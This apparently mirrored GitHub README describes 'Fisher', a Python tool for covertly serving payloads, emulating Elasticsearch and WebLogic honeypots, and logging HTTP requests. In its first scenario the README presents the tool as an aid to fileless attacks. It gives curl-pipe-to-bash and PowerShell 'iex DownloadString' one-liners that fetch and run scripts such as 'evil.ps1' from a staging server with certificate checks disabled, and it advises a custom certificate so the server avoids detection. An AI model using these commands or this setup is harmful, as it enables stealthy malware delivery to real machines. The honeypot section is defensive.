Giter Club home page Giter Club logo

fisher's Introduction

Fisher

Fisher is a dispatcher、honeypot and http-request logger.

隐蔽的下发程序、蜜罐、http请求记录。

参数

python3 fisher.py -p [port] {-s} {-Z 0/1}

		-h / --help : show help message
		-p / --port : set server port to listen on
		-s / --tls : https support
		-z / --honeypot : 
		                 '1' for elasticsearch
						 '2' for weblogic

场景

场景1 样本下发

step1: 根目录手工生成证书。默认证书用的多了会被标记特征,强烈建议自己手动生成一个。

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

step2: 将待下发文件放置在data目录中。拉起程序后会自动放置于随机目录中。

step3: 运行以下命令。

python3 fisher.py -p 56221 -s

2022-07-09_135007

step4:如上图所示,客户端可以使用如下方法隐蔽的下载程序,可用于辅助实施无文件攻击。

# Linux
'''
curl https://SERVER_IP:8443/JHB0IwokE5Y7nDUqOdaxur8Mi31Q9g/bash/1.sh -k -s|bash
wget https://SERVER_IP:8443/JHB0IwokE5Y7nDUqOdaxur8Mi31Q9g/bash/1.sh --no-check-certificate
'''

# Windows
'''
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex(New-Object Net.WebClient).DownloadString('https://SERVER_IP:8443/asdW323dj293S02eaj302dj02d932/evil.ps1')

(New-Object Net.WebClient).DownloadFile('https://SERVER_IP:8443/asdW323dj293S02eaj302dj02d932/1.zip','c:\1.zip')
'''

场景2 蜜罐

简单模拟elasticsearch、weblogic两种服务。

step1: 如需https支持,需要手动生成证书

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

step2: 运行以下命令。

#elasticsearch
python3 fisher.py -p 56221 -s -Z 0

#weblogic
python3 fisher.py -p 56221 -s -Z 1

**step3:**标红的[H]记录表示蜜罐相关事件,相关细节也完整的存储在log目录下,甚至包含POST数据。

2022-07-09_134711

fisher's People

Contributors

aplyc1a avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.